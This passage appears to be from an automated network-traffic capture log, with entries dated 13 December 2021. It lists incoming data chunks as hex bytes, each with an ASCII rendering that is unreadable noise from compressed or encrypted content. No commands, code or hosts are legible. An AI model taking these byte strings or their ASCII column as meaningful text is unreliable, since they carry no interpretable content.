                                                                                              2021-12-13 23:57:17 UTC6374INData Raw: ce ed 4b 4d 2a 3d 87 ae 0c 3c 4c 9f ea 94 13 40 7f ca 2b 18 e6 57 55 7b f8 d1 5f a7 6d b7 d7 06 54 a6 57 01 71 e2 92 1e 37 7e 71 76 e7 e1 08 c6 d3 1c 08 1c 13 c3 be 2e a4 d2 2d 84 ca 5e 19 4a 56 14 b5 03 07 07 60 1c 7b fb 4e 48 af 7f 97 b6 a5 65 1a f6 56 b9 88 c4 5e ab 90 b5 99 55 d0 99 f1 22 d0 5d 09 e6 7a 61 1b bc af c6 c5 ac f0 4a c4 91 11 b9 14 0c c3 15 d5 c7 23 dd 0b e9 71 07 bf 2a af 5c fb 3c dd fe af 3e d6 64 83 f0 a2 61 60 ec dd 81 02 bb d3 f8 4a 2e 9b 6f cb a4 d9 35 b0 a0 7b f7 3b ee 89 e8 27 ca e0 3b 94 ea a9 e4 8a e8 7f b1 50 00 98 84 07 42 15 9b 56 a3 c8 2d ae 49 1f 51 36 9a 1c e2 26 f0 d0 9a 7a 3d 74 62 ab 4d 55 f7 e5 05 00 18 e2 41 05 0c c1 9e b0 bc 3b 88 af 70 a7 12 27 ed 81 b0 10 6e 92 77 51 6c b9 0b 93 6f 5b 1a 45 77 93 7f 92 41 62 f4 ca
                                                                                              Data Ascii: KM*=<L@+WU{_mTWq7~qv.-^JV`{NHeV^U"]zaJ#q*\<>da`J.o5{;';PBV-IQ6&z=tbMUA;p'nwQlo[EwAb
                                                                                              2021-12-13 23:57:17 UTC6390INData Raw: 47 5b e1 98 f3 70 89 59 d5 26 ff 8e a1 19 c2 1b 9a d2 58 a5 55 af 05 3e b6 5a 12 79 c9 43 f6 8e 5b e2 da 8f e9 2d 7c cb 63 59 3f 09 02 c0 0b 76 fc a2 50 18 81 19 ef 75 74 33 8e 94 4c 3d 49 e3 d8 9b d6 04 7e 94 e6 67 2c ac b6 1b 6f c4 74 c3 5a 98 a7 60 ed bd 6a 03 6d 44 fc 80 aa 1f 36 ca 6d 0b e6 ab 4a 5c 40 33 e1 69 0f 65 5f c5 ca 21 e6 fb 76 3c 9e ed f7 26 12 46 44 9d c2 8f be 39 bd 3c b9 1c 33 d5 72 c2 c5 bd 78 b2 37 5f 96 e1 a2 49 eb c7 83 58 13 c2 05 95 35 81 49 1a 5b bd 70 a5 af 64 2d ac e8 c9 87 66 ab f3 d3 96 f8 3e 6a fa 19 ac 0f eb 94 4e 4a 40 19 83 64 f8 2c 83 73 22 de 8a 63 f8 e9 4b d1 60 a1 90 4f 96 23 fa 2b c8 05 f2 8a af 5f 7a 7b b4 7f 93 be ab 39 ef 2a 58 52 9b ee 44 dc cd c3 3f c1 57 9f d2 f7 64 6d 6e 6d 9a 76 cc f4 f8 cd 73 d9 ff bc f0 71
                                                                                              Data Ascii: G[pY&XU>ZyC[-|cY?vPut3L=I~g,otZ`jmD6mJ\@3ie_!v<&FD9<3rx7_IX5I[pd-f>jNJ@d,s"cK`O#+_z{9*XRD?Wdmnmvsq
                                                                                              2021-12-13 23:57:17 UTC6391INData Raw: d5 0a 4e 7e 99 d2 9e a0 82 5f 1b f4 c4 a5 f6 c4 eb 0c 53 84 97 66 fc bc e6 e8 aa 98 2a 25 f5 95 48 dc 79 d9 19 8e 0a 11 63 cc 73 3f f9 87 17 a3 c4 34 48 03 01 27 dc 40 84 f8 8e 51 16 79 97 cf 20 03 88 c4 20 4e 1d 78 60 8f e3 8e b3 c7 04 07 92 92 41 93 54 bc 5b 1d e6 18 63 33 55 08 36 c8 82 9e 2c 09 3c 99 5d 24 1e 81 cf 2b 1e 39 17 b0 2f 79 e4 ff 20 cb 06 0f 10 0a bd ca 38 c8 8a 45 cb 96 71 0e 24 c7 3f 79 bf 5e 6e 36 7a 37 17 2b 9a 14 6b 0c c6 0f 92 0b 00 9a f6 e0 26 fa 4d 8f 17 27 44 2d f9 b3 80 fb cd b4 21 df ad c4 5e d7 fe 2b 48 4e fb e1 61 55 20 af 1d bf e0 a7 3e 7b 6e 2d 31 00 11 42 cd 57 3c c7 af 5c d1 c5 c3 94 d1 07 b1 67 53 5e 58 8c 21 5b 3c 2c 2f a7 36 90 5c 28 96 15 57 eb 8e 1b fd 3a ae f2 61 74 81 6a 8f e1 07 4f 5b 1d a3 65 9e 18 22 ad 7e 19 65
                                                                                              Data Ascii: N~_Sf*%Hycs?4H'@Qy Nx`AT[c3U6,<]$+9/y 8Eq$?y^n6z7+k&M'D-!^+HNaU >{n-1BW<\gS^X![<,/6\(W:atjO[e"~e
                                                                                              2021-12-13 23:57:17 UTC6407INData Raw: 16 af d2 6b a7 33 ac 36 65 dd ae 2b 9f 2c bd b3 1b 19 13 de f1 42 f0 8c 86 49 57 16 d7 1d da fa 90 d3 80 db ea 40 cc 8a 49 ba 25 89 a7 e2 b0 e3 92 1b 9a 79 57 39 63 6a e2 bd 8a 29 8c 80 ed 68 88 05 ae 44 9e cd 84 7a f7 a2 83 b7 a9 8e cd d5 84 54 fd da ce 7d f5 7b ad 9e 47 84 46 d9 73 3a 77 8f 4b 74 4a 4f 52 0c 4c 48 98 92 39 09 00 dc 0a 24 fd 51 17 82 23 f0 66 3f ab 48 5f c8 bd ec 6d 0a a2 59 da 08 97 58 22 dd 3f 6b 5a 9c 4b f2 c2 5e 47 01 ab 73 8b df 43 64 6c 2b 26 c4 6f 53 52 05 f3 22 13 7a a9 cd 40 b9 94 b0 a9 58 47 25 f3 04 5e fc 65 14 88 75 b3 b9 f6 e8 91 a1 bf e2 26 c7 0d 6f 05 27 8d a9 bf 63 d7 07 bf 30 84 3a 29 7a d3 04 02 02 1c 17 db 93 30 ec 7b 19 86 b1 3f 63 49 b2 d9 42 12 f1 af 8a 9b 2f ca 42 87 3d c5 53 71 64 d8 7e 95 b0 d3 6c 18 06 68 f6 7a
                                                                                              Data Ascii: k36e+,BIW@I%yW9cj)hDzT}{GFs:wKtJORLH9$Q#f?H_mYX"?kZK^GsCdl+&oSR"z@XG%^eu&o'c0:)z0{?cIB/B=Sqd~lhz
                                                                                              2021-12-13 23:57:17 UTC6408INData Raw: 5e 9a 23 ba f4 c9 8e 95 ba 52 63 51 12 e2 7c 8f 1f 7a ce bb ea f3 38 e2 13 a7 13 2a 74 96 c3 03 36 ac a5 0d 39 23 6e df 01 c9 55 0b 10 40 1e d5 0c 24 d0 fb d6 a0 e3 a4 33 de 10 c2 34 52 32 09 55 6d ac af b4 cf 53 0d d6 98 96 89 20 63 44 06 3e 22 51 df 50 28 28 d5 84 1e 6c 0b 06 4b f4 9e 4b b0 36 ba 81 99 13 05 f4 ba 46 1c 18 7b 3a f0 83 53 73 4e 08 bb 07 18 03 82 84 30 8b 5a 20 59 57 5e b1 74 c5 e3 7b 26 85 1f 17 da 83 aa 48 31 24 5b 71 65 c1 c8 67 11 7a 5a 41 02 4b 01 27 bd 31 16 6b ec 74 e7 37 f4 62 9b 66 41 5b 95 89 fa 62 15 ba ba 57 2c d9 a4 6e 3b 67 91 f3 c7 ed 05 ad 3c 26 9b bb c1 1f 20 54 2b a5 f1 83 81 30 0c 8e b5 18 00 68 84 52 6f 0f c9 bc b8 85 62 75 ad c2 90 1a ab 6c d7 94 f9 57 10 a4 1c 62 53 d5 90 c3 b8 55 26 42 cf ff 9d ce 12 6a 9f 10 c2 72
                                                                                              Data Ascii: ^#RcQ|z8*t69#nU@$34R2UmS cD>"QP((lKK6F{:SsN0Z YW^t{&H1$[qegzZAK'1kt7bfA[bW,n;g<& T+0hRobulWbSU&Bjr
                                                                                              2021-12-13 23:57:17 UTC6424INData Raw: f9 3c 47 b1 39 6d 30 b7 98 ef 21 eb 6a 48 ea 5c 2f a1 05 75 b3 dd 0b 5d af df d5 87 27 17 40 19 c1 4b 62 98 32 7e 68 46 98 79 a4 27 99 9b 37 75 5f e5 11 02 de 52 da be e1 6e 97 9b 64 03 3b 1d aa d6 a6 a5 59 53 ba 3c f1 c5 07 12 f0 27 dc 19 b2 c8 59 d3 e5 ec 9b 2d 50 af 6c d7 11 58 94 96 ce fc f9 5d c5 41 89 3a 7e 6f c3 23 33 03 21 4f 24 55 d6 9b 76 16 41 6f 05 da ab da 79 4c 1f 64 a8 ad 31 69 16 00 95 fa 08 94 b3 19 54 df db 68 0a 26 6f 36 4a 23 50 18 e6 67 73 dc d0 53 cd 91 92 7e 97 d2 0d 39 7c fb 7e 9a 7d 49 21 2d 4b 32 6d a6 49 1b 29 2a 5f 2b 97 a7 31 e7 f7 c6 26 ad 9b f2 6a 6f 0f 02 e7 51 ec e9 cb fe 9f eb 1f ae 30 e5 44 51 a1 53 1e 53 7c 9a bf 07 f6 c5 40 97 0a 16 95 f7 3a 1a de 5f 88 99 71 7a 14 24 2a 16 2c fb b7 7a e9 a0 57 37 2b 25 a5 eb 7a 71 31
                                                                                              Data Ascii: <G9m0!jH\/u]'@Kb2~hFy'7u_Rnd;YS<'Y-PlX]A:~o#3!O$UvAoyLd1iTh&o6J#PgsS~9|~}I!-K2mI)*_+1&joQ0DQSS|@:_qz$*,zW7+%zq1
                                                                                              2021-12-13 23:57:17 UTC6425INData Raw: e8 99 a6 68 1f fd 70 fd 3b ca 19 54 56 0f 6b 5f f4 04 97 ea ce 03 89 69 16 97 93 a9 34 95 5d 46 da d4 4c 5f 55 ff 6a df fa 30 5c ed 82 8f d6 5c 54 4a 5f f9 00 15 92 1b cb 0c 34 c1 ba 99 d6 b3 59 35 2f 30 07 5e b2 c4 f3 1e 4e 65 aa 00 4f cd 79 60 2d bd 10 2c 78 c0 17 cc 32 cb 54 23 26 f4 b7 50 e8 41 68 bf 94 71 43 9a a7 67 3c 84 59 d3 27 d7 9b a2 6a e9 69 8d 4f 31 fb 0a 74 30 37 c0 1b ad 7a 34 f3 f2 ca 78 80 00 28 ec 8d 66 c5 9f 14 1b 32 b5 4c fe b4 0d 70 ed 94 4f de 13 63 76 1d 28 4e 1d 13 00 9e fe 90 4a 2b 25 f2 b9 94 c0 26 97 b2 f5 e9 0a 4b 17 f0 d7 58 77 6c a3 55 99 3b bb f9 8b ba 19 c4 9d c3 62 e1 d9 08 15 ac 56 0f e0 ce d7 be 40 dc 2d 5c fe e7 d1 fc 62 d0 ae 46 15 0a 76 cf 84 1f d7 0a 8d c5 4c a6 d1 42 9d f1 dd 32 02 21 89 3b f2 89 0d da 3c 67 11 02
                                                                                              Data Ascii: hp;TVk_i4]FL_Uj0\\TJ_4Y5/0^NeOy`-,x2T#&PAhqCg<Y'jiO1t07z4x(f2LpOcv(NJ+%&KXwlU;bV@-\bFvLB2!;<g
                                                                                              2021-12-13 23:57:17 UTC6441INData Raw: a2 dd d8 5c ce 34 14 ad 32 f8 bd 0f 41 d4 b4 50 21 9c c9 b8 80 32 a8 e4 0a 6e 33 02 67 d5 20 18 f3 bf d4 44 b5 76 0c 9d d6 2a 5b 85 39 00 2c 3b 4c 39 27 8f bf 1a 48 76 d7 92 70 7a 98 a6 fe dc af 23 b4 2d 42 92 81 46 1c c1 1c 1a 48 4b dd 64 63 d9 2e f7 c8 25 99 dc b9 9a 2a 7e 78 1f 6e 40 df 41 7e 8d 3a ea e9 de 12 a9 fc 4c 4b e3 77 96 d6 a3 f7 5e 11 3b 95 e3 56 19 50 45 eb da 3d 2b 33 4c 95 d2 5c ab 12 8a cb 3b 0a ca df 92 f5 d1 93 9d 3e 26 a1 0c ae e9 fe 3f 12 ab 03 20 7b ed da 6d 6b 59 a1 58 2b 7d 53 a7 99 eb 51 9c 8b 72 1e 63 5d e2 a5 18 ba 40 a8 66 05 20 bb d8 e7 b9 aa 71 71 f2 10 79 30 0e 1d 52 e2 16 86 cc 3b 58 97 1e 9f e6 a2 32 9b 23 bc e2 d5 fd 17 e9 d7 73 4f f1 4e 33 a7 66 c2 18 f7 56 09 88 12 75 24 ba da 36 db 62 14 0c b1 5c a4 4e a5 58 3e 49 1d
                                                                                              Data Ascii: \42AP!2n3g Dv*[9,;L9'Hvpz#-BFHKdc.%*~xn@A~:LKw^;VPE=+3L\;>&? {mkYX+}SQrc]@f qqy0R;X2#sON3fVu$6b\NX>I
                                                                                              2021-12-13 23:57:17 UTC6442INData Raw: 16 6a 7d 2e 66 8a de 8b e3 c2 fb fd a7 5e b0 c7 72 cc e3 7c b5 48 01 19 bf 7f 22 06 95 53 7d c9 45 e1 10 f3 aa b0 f3 52 23 00 bb f6 ef 7b d9 b3 30 b0 a4 b7 29 46 3f 8b 08 41 b7 65 6d b8 44 ee 5b bb 52 91 bb 03 3c df 13 b0 4f 47 cf dc 70 8a 43 ec fb 99 8d 9f 36 a2 ad 81 92 e4 6b fa be 70 17 2c 78 37 11 58 b8 cc 64 ef 14 4a c6 98 e8 e7 9d 13 2b 61 03 b1 66 e0 e3 66 ea 05 e0 88 43 69 d7 da df b0 f9 2c a1 15 d3 75 b2 52 b2 75 c7 c6 37 cc 53 38 27 7b 21 a0 6e c1 bf 21 d6 e0 71 ab a8 8b 29 b9 c2 f7 c7 c1 60 76 f3 09 52 29 e1 43 7f a7 7d 8c e5 a0 a6 8d 86 cd 2c ec d2 b9 f9 aa ad ab e6 36 76 b1 f4 32 00 9a 95 c9 66 a9 09 67 dd 7c 7e fd 0a f9 75 5c 05 98 c5 ae 35 1d dd 75 e0 0e 77 ee 1e 47 c3 ae ed 24 2d 1e 58 4f 95 3d 04 3f 00 d1 14 d7 62 7b b5 55 c7 aa 2e 3a 99
                                                                                              Data Ascii: j}.f^r|H"S}ER#{0)F?AemD[R<OGpC6kp,x7XdJ+affCi,uRu7S8'{!n!q)`vR)C},6v2fg|~u\5uwG$-XO=?b{U.:
                                                                                              2021-12-13 23:57:17 UTC6458INData Raw: f6 bd 62 da 28 0e 5a 82 35 94 88 e8 3d 92 3d 89 15 2e 15 79 0e 23 bf 26 34 ca 1c d4 c3 6e a7 cc 6c 8b ca d6 1b 3d f2 4b ea c6 27 f5 8b 37 72 b2 6f 67 6a 57 ad 74 02 17 0b 26 a4 a7 8b ac 0f 90 eb cb 7c 77 6b 67 0c e8 96 4a 2d 35 6c 45 27 5c 8d 2e 1d c4 fa 03 d9 11 fd a5 e1 98 26 a2 a6 3f d0 ea ec 15 05 ba 00 af f4 33 f1 2a 10 13 82 d6 17 47 06 9a eb dd aa cc a1 12 d5 ef 92 ed 18 84 81 0e 95 15 3d aa 43 46 41 32 9f 6a bc 19 7c 67 db 5d 2c 4f e6 47 c5 97 b3 52 80 74 f2 47 6a db 4d f6 4b 0d 66 6b b5 6c b8 18 95 08 5f cd ea 45 3e df f6 e6 ce 9f 99 4a 29 41 55 25 26 61 85 a2 56 82 4f 50 63 9c 1e 6a 9d 90 48 50 a1 f3 68 12 e3 4e e7 a1 f6 86 0f 94 0c bc 6e 81 7e 91 ba 1e 20 b2 d5 73 ca 68 51 07 91 be ad b5 59 04 ba 7b 6c ca 8e 05 bf 8f f6 87 91 5a 10 c9 44 c6 f4
                                                                                              Data Ascii: b(Z5==.y#&4nl=K'7rogjWt&|wkgJ-5lE'\.&?3*G=CFA2j|g],OGRtGjMKfkl_E>J)AU%&aVOPcjHPhNn~ shQY{lZD
                                                                                              2021-12-13 23:57:17 UTC6459INData Raw: 7e e8 a4 b0 8c fb eb 15 c7 7f 6e 86 1c 3e db 93 79 09 c9 9c 26 26 53 20 e3 8d 9f 57 c5 ba ad a0 21 c3 be c5 68 7f b3 96 65 f6 cd 31 b4 80 c5 c8 7b 8c 89 e2 f3 f9 9a 5c 62 cf 07 7f 7b 8d 8b a6 3a 72 ca d2 5f 75 7d 12 31 e4 70 82 2d fe d6 05 00 9c 45 05 8a 59 b4 8f 17 76 72 55 8d 82 94 d3 12 11 07 c5 08 40 df 36 54 7e b2 f0 f5 95 9f b2 1e 95 0c 76 55 6e fa 84 e2 27 59 e5 8f ce e9 9c 51 5b b9 9c 79 05 58 a5 e7 3e dd e7 45 be 32 80 37 ef 6f d7 b5 b2 0b c0 e7 3f 07 e8 c4 2a c4 0d 62 a6 3a 08 97 c4 76 ee 79 87 2c b8 f9 a0 40 61 8c 25 93 b3 77 57 90 e0 c7 06 be df af 03 dc 65 e1 ab de 2a d6 04 d6 41 0e 71 64 9a 53 db 03 d9 0e 0d 5f 43 48 80 31 d6 cc 2b 38 d7 d0 0b ad 4b b5 d2 94 ba f8 9e eb 33 a4 9b 0a 36 93 11 47 0d 49 0f a5 bc 20 59 20 96 f8 05 7c ca 3b c7 a5
                                                                                              Data Ascii: ~n>y&&S W!he1{\b{:r_u}1p-EYvrU@6T~vUn'YQ[yX>E27o?*b:vy,@a%wWe*AqdS_CH1+8K36GI Y |;
                                                                                              2021-12-13 23:57:17 UTC6475INData Raw: 2f ca 44 75 fd 4e eb 39 05 56 af e2 4f 93 fc 06 63 1a a4 ca a3 12 01 15 97 53 64 11 f2 2b bc 5e 3d e7 ea 10 36 26 22 07 dd 74 89 a8 4f 0d e9 15 ec 90 cf ac 6f 01 d0 eb f5 88 15 b4 95 c5 3b 65 6f d4 a9 d3 c1 ff 13 cf 37 85 47 c8 51 bc 22 57 7b 62 11 c8 f7 f7 37 77 1e 62 bd ad 0d 1b 4f 50 19 75 b4 37 6a 31 69 a0 6c d0 02 4f 19 8d cc 59 c5 90 c5 3b c7 c5 5a aa cc 6b 8e 67 4d 00 69 6c ce dd 06 71 45 58 60 1f 07 5c c5 fc f4 4a 55 9e 9b 0c d0 29 9d e3 3d 0e ea 13 50 77 25 c7 29 65 b6 05 8b 21 d4 f8 e5 37 89 7e 49 98 65 97 a2 d1 d2 ea 72 bf dd 16 7d 04 b8 1b 04 6d 20 3d 04 40 38 43 df f5 c4 17 3a 10 6b 5d f0 27 82 3e 65 12 f9 f9 99 da 2a b4 98 0d d4 d8 a7 0a 63 6d cf 6b f7 33 87 72 ce 7e 3e 37 45 4f db d2 08 ab c7 d1 70 ed f6 77 18 86 d8 15 4b 95 ad b4 d8 0f 35
                                                                                              Data Ascii: /DuN9VOcSd+^=6&"tOo;eo7GQ"W{b7wbOPu7j1ilOY;ZkgMilqEX`\JU)=Pw%)e!7~Ier}m =@8C:k]'>e*cmk3r~>7EOpwK5
                                                                                              2021-12-13 23:57:17 UTC6476INData Raw: f8 c6 b5 3d 0d 5a bd db 56 65 81 7c b9 79 a9 cf ac 28 a9 a5 5b 5b d1 dc c6 f1 c1 5e 13 11 a4 63 75 95 2c 44 e8 63 5c 0f 52 0e 0a 03 03 b4 1b 9c d2 d7 9a ce 6d f3 ba 32 f0 bc 1d e5 1b 97 66 95 0b 6d 4f 94 90 28 8e a2 fc f8 ac 64 09 3c ee da c3 1c 1f 1c 79 2d 1d b0 e2 38 02 80 be 82 70 5f 00 34 75 53 16 7b dc 59 76 a4 1b eb fd 7e 61 c5 a5 5f 7c 13 97 41 39 de c6 63 89 24 c3 18 5a 29 52 11 82 c2 31 29 ac 87 dc 5b b7 cb 72 57 a1 fa 92 74 89 2d 40 fd 6e 65 86 ca d5 2a 47 24 78 96 c2 56 92 e0 69 52 22 9e 71 e6 7d 9a 71 2c 2e fa 23 df 30 4a 42 9b 4a 7d c2 51 ee 4f f6 77 c0 7e f2 c2 cb fc 0b b3 ac 9b 6a 39 5f 91 fe 6e 8b dd 13 09 1e b9 44 9d b9 95 95 64 a4 52 79 8e b2 22 7c 7e 1e 93 27 4a 02 cb 3e 9f b4 a9 fe 7e ed 12 b0 35 ef 61 2f 6f 14 5c 9b 83 5f f3 e4 df c2
                                                                                              Data Ascii: =ZVe|y([[^cu,Dc\Rm2fmO(d<y-8p_4uS{Yv~a_|A9c$Z)R1)[rWt-@ne*G$xViR"q}q,.#0JBJ}QOw~j9_nDdRy"|~'J>~5a/o\_
                                                                                              2021-12-13 23:57:17 UTC6492INData Raw: 3f cf 1e c7 c8 e1 da ac 7c e0 93 23 a2 06 13 4d 2d ad 2b e6 27 1e 8a 49 08 7f 91 97 e5 bd fb d1 19 8c e2 a1 a3 ff d2 e4 05 b2 d4 dd 76 6e 3e a1 88 33 cc 98 23 3e 6e 0d b5 06 81 57 c9 f7 92 3d 95 f0 44 d2 6e fa 79 96 31 8e 2a 91 db 90 ca 5c 84 b9 ae fe 2f 61 b0 c0 4d d9 68 33 9e a1 f3 19 2f 64 89 7d 1e 36 64 f3 b6 6c 1c 03 e0 16 55 f4 b9 ae fc d6 39 f9 31 52 fa 1f 57 cf ac bd 7f 48 c3 bd 9c 6a 5d ab 1f 1c 78 e1 39 cb 55 6f ea 2e 84 2e 99 6a 5c 58 47 4c ed 1b df 74 df 01 74 3d 1a b2 3a f6 02 cf 18 a8 25 97 08 ad db 35 57 90 3d a2 cc d8 19 71 fe bd c9 ad a3 15 e0 fb fb 7e 31 70 41 19 06 c6 f9 86 b3 ae 58 14 11 50 87 e0 21 a1 63 a4 13 16 77 28 f6 8f 2b 44 3f 41 b1 b7 f8 bc f0 d8 30 68 2a 0b 96 52 c7 8b 23 af bf 6f 75 dd 4f 64 6b 94 1b d8 28 ac 2b 6b 5d 67 12
                                                                                              Data Ascii: ?|#M-+'Ivn>3#>nW=Dny1*\/aMh3/d}6dlU91RWHj]x9Uo..j\XGLtt=:%5W=q~1pAXP!cw(+D?A0h*R#ouOdk(+k]g
                                                                                              2021-12-13 23:57:17 UTC6493INData Raw: 83 41 fa 02 5e a1 74 b9 2d b4 05 25 2d 8a 36 69 42 7d 5c 10 f2 d6 21 ca 62 d2 f7 39 e4 c7 79 17 22 37 ca 22 9e 16 15 f8 70 cd 1d d8 50 97 9e 63 f6 57 a3 86 b6 e4 13 35 43 bf 2a 80 4a 04 13 33 f4 2a 6f af 43 cd 87 5c 64 0e fe 6a 5c f5 d1 d4 6a 86 e0 8b fc ab cd 3e 8d 53 99 58 bc 94 5a 1d e7 6f 9e d7 15 6f 5e 33 2d b6 0f b0 dc 33 b0 d7 78 ad 84 ee 53 e9 26 08 eb 5b 1b d5 5d 00 68 d5 73 98 1b 4d f8 67 39 f3 97 d3 d0 ab 54 c4 57 e0 b2 07 ed c6 1a a5 fd 2a 1a c7 fc 2c b5 cc d2 d5 da ea df ce 31 59 34 79 e5 bb 02 b6 a3 a6 f9 c3 c9 88 31 57 01 12 60 34 fb e6 9a c8 e2 d4 05 d1 77 3e fc cb 61 46 40 df d7 68 77 3b 00 13 26 22 1a 83 06 f8 0e 42 3d 8b 2c 2b d4 a0 bf e5 6a cc 2d 75 87 e7 db 16 3b fa 51 d7 79 2f b4 95 23 26 a9 55 cc 88 cb ea 9f 53 7c b4 a8 f3 36 e1 8d
                                                                                              Data Ascii: A^t-%-6iB}\!b9y"7"pPcW5C*J3*oC\dj\j>SXZoo^3-3xS&[]hsMg9TW*,1Y4y1W`4w>aF@hw;&"B=,+j-u;Qy/#&US|6
                                                                                              2021-12-13 23:57:17 UTC6509INData Raw: c9 67 18 d1 a0 99 97 b6 62 ec c7 99 99 ff be 89 3f bc e9 60 ef bd 19 7a 4a b0 cb 80 59 6b 5e ca e1 f7 0c c7 58 51 ab c4 fe 2a 98 86 59 b4 41 55 01 09 63 d0 5d bc b4 0a ea 5e c9 0b d5 c9 8c e5 8e c5 f5 1b 58 da f5 64 a3 b3 38 12 94 e7 2c 44 99 8c b6 b0 54 98 97 01 f2 3a 58 ec 85 c5 35 3e 9e 7e 3a 31 93 32 c5 3d 1d 74 fe 04 4a 81 16 df 36 12 d7 24 c8 c7 5b a1 7a c0 2e 35 b7 2b 85 f9 ff 0f ec 5a 1d 0b 74 81 62 c9 4b 7f b9 55 20 70 a5 42 57 76 79 71 15 47 59 87 d6 c5 53 cc 9a 0d f7 d3 3d 9a 7a a9 a3 e9 8a d3 cd 47 76 8e 4b a4 e5 42 fd 79 e3 f8 6f e7 2c c9 4a 22 a2 f4 f9 2a 50 ca a9 ec 3c 94 a8 95 bc 80 b6 6e aa 68 1e 54 2b de 8d 81 3c a8 3e da 7d 75 b6 dc 94 bc 38 b9 9e 46 47 02 18 3d a7 23 70 d0 f8 9c b2 35 46 eb 3b e3 19 3d af 2b 12 b6 a5 fc c4 3f 0f 22 42
                                                                                              Data Ascii: gb?`zJYk^XQ*YAUc]^Xd8,DT:X5>~:12=tJ6$[z.5+ZtbKU pBWvyqGYS=zGvKByo,J"*P<nhT+<>}u8FG=#p5F;=+?"B
                                                                                              2021-12-13 23:57:17 UTC6510INData Raw: 72 dd 33 91 d4 ff a6 b4 3b c7 b1 32 28 db d7 7d fb 0c ce 9f c4 cd 0e d6 b1 f8 be 26 64 08 ec a6 94 a8 72 e7 91 c3 ac 40 0b cf 64 c3 95 17 18 1b 7b e5 5f 62 9c ef 68 ea 82 66 ab 7e be 23 5f ee 01 0b c1 6a f2 fe 78 56 de b9 05 58 37 2d 99 97 84 78 2f f0 9f 37 16 41 51 c2 2a 93 f4 2c c1 81 05 11 91 e6 ec 57 cb 24 bd ae 67 41 10 88 c8 89 d9 c7 d5 a7 6c bb a1 59 20 83 a3 19 f5 ca b2 94 a2 28 47 03 68 04 0a 73 0d da bc 72 65 c4 25 2b 4e a4 04 0b 3e 38 80 f1 e4 16 9e 16 ae c7 75 1e 3e 10 0c 2f 6d d3 2d 57 64 96 f0 69 01 d1 ab 7c 75 4b 06 09 15 b5 8a 42 0f eb ee da be e0 3c 4f 04 50 9e ca be a3 05 80 e4 c1 9f 38 a4 a3 f5 0c bb d9 41 51 1f ba 46 fc 37 6f f4 85 13 7b cc 4d 24 ac a8 2b 7f 21 99 b8 65 f0 5e 36 37 bf 7f 78 19 0d a5 07 14 87 46 ba d5 2c 9f c5 6b c1 40
                                                                                              Data Ascii: r3;2(}&dr@d{_bhf~#_jxVX7-x/7AQ*,W$gAlY (Ghsre%+N>8u>/m-Wdi|uKB<OP8AQF7o{M$+!e^67xF,k@
                                                                                              2021-12-13 23:57:17 UTC6526INData Raw: 0d cc 81 91 70 fd b9 e8 cf 38 55 a5 cc db dc da f5 d1 eb 1f df 82 94 ab 91 6a 9d 52 90 0c 19 c0 5d 48 e7 ac e2 d9 5f 4f f2 fb d9 11 85 c9 85 41 72 c9 2b 4c 74 5a b6 2d d3 5b e6 40 37 88 74 79 18 cb 1d c5 b6 45 4c 03 62 a0 1c b0 a9 95 e1 7f f2 3e ea 47 d4 b5 d7 e8 bc 13 a0 69 91 57 09 4e 5f f1 32 86 30 34 5f 45 5b ac 46 00 40 c8 1e 61 1e c1 f5 4e f7 94 1b c8 85 f9 fb 11 68 dc 52 10 8d c6 ca 2b d4 46 1a 94 cf b5 1b e8 ef eb 87 cb 66 c7 52 14 ab ee 23 69 37 17 16 19 bf 82 e3 e2 25 62 56 50 17 99 79 47 a1 d3 8d 3c 13 36 38 5a 2f 00 6c 66 34 cf b6 3e 97 bf 05 e9 2d 33 9f ea ec 0a 3a 3c fc 51 77 74 75 58 bf e7 12 89 da 32 77 1a d0 fa 96 f0 7e 0f ac 85 63 ce 65 bc 4e f1 96 7f 3f be aa fd f3 9f b7 c5 7f 6c 70 02 db b4 f0 4a fb 02 e6 29 c7 1c 87 b1 8e 32 47 23 48
                                                                                              Data Ascii: p8UjR]H_OAr+LtZ-[@7tyELb>GiWN_204_E[F@aNhR+FfR#i7%bVPyG<68Z/lf4>-3:<QwtuX2w~ceN?lpJ)2G#H
                                                                                              2021-12-13 23:57:17 UTC6527INData Raw: d6 97 d3 1d 80 67 27 ab 7b 8c ce ab e0 62 c2 54 26 33 2b 4a ad da 1f 13 c8 a5 17 21 10 30 04 06 0c 7b 83 7c d6 48 e5 dc df 54 1a b6 4d cb 01 3c a2 9d 90 67 9d 7b 58 2f 5a bf d4 df b4 34 f9 04 df 80 4d 53 14 e7 75 37 4c 80 05 16 69 e2 38 72 5d cc 35 e2 ca de 6c a9 95 5f ca 9a 63 d6 7a 91 96 e7 f1 7e 25 37 55 84 a2 65 fb 91 ad 9c 40 26 46 1f 28 25 90 f3 2e 6f 6f 59 63 fc eb c1 1e ac b2 59 d6 4d 96 a6 b3 9c 61 d2 2c 0b d0 77 17 71 6a 7d 72 e7 ea 14 65 b9 04 d2 6c 48 07 0b 63 72 51 dc 68 28 d9 16 37 f8 0f 74 1d 18 cd 2c fe 4a 46 1e 2a 1d c1 a5 df 69 26 54 ff aa 90 1c 9f 1b 1d ea 05 a2 47 3f 34 10 dc c4 40 54 a4 c2 f5 f9 dd bd 3a ec a3 75 f9 3f 2d 4c c7 19 c5 7a 04 ad d0 5d 5d b0 4b 15 e7 d4 ce d2 09 5c a6 2b cb 65 29 f6 16 bb 93 ac f9 11 fd dd d3 49 26 48 fe
                                                                                              Data Ascii: g'{bT&3+J!0{|HTM<g{X/Z4MSu7Li8r]5l_cz~%7Ue@&F(%.ooYcYMa,wqj}relHcrQh(7t,JF*i&TG?4@T:u?-Lz]]K\+e)I&H
                                                                                              2021-12-13 23:57:17 UTC6543INData Raw: 73 bb 31 f1 05 98 ca 9f bb f1 f8 a0 41 62 db d1 92 ee ee 2d 6a e1 de ec 2e bd 1e fd fc 2f 32 ec 42 cc a0 4c 0f d2 2a 62 ad a5 4f 56 67 cf 4a c7 34 0d dd 37 6d fd 99 19 8b f3 0d f6 4f 4e 3d ef f5 58 04 23 9b 0a f1 1e 81 0c 0b b2 8b 2a 7b 2d 58 8a 6f 7a 64 54 ec ac f2 ac 49 c0 c4 7e d2 9e 53 83 37 3c bf 12 48 14 fb f0 47 3c 7d a2 85 32 54 eb 80 57 08 62 0d 53 8b ba f6 2a 65 dd 73 33 ee 7b ab ea 0a 50 d1 ed 73 57 c7 b2 8c 28 47 de f2 8e 1e 18 ba 73 69 97 49 7c 21 9d 09 80 ce 64 50 59 85 7c eb 48 43 6f dc c5 aa 19 8c d3 46 6a b4 6c 20 4a 0f 8a e9 9b 99 dd a7 60 60 59 30 33 a7 02 74 a7 d9 eb 9a ab 38 43 31 7c ec ec 6e 61 50 3d c4 bb 73 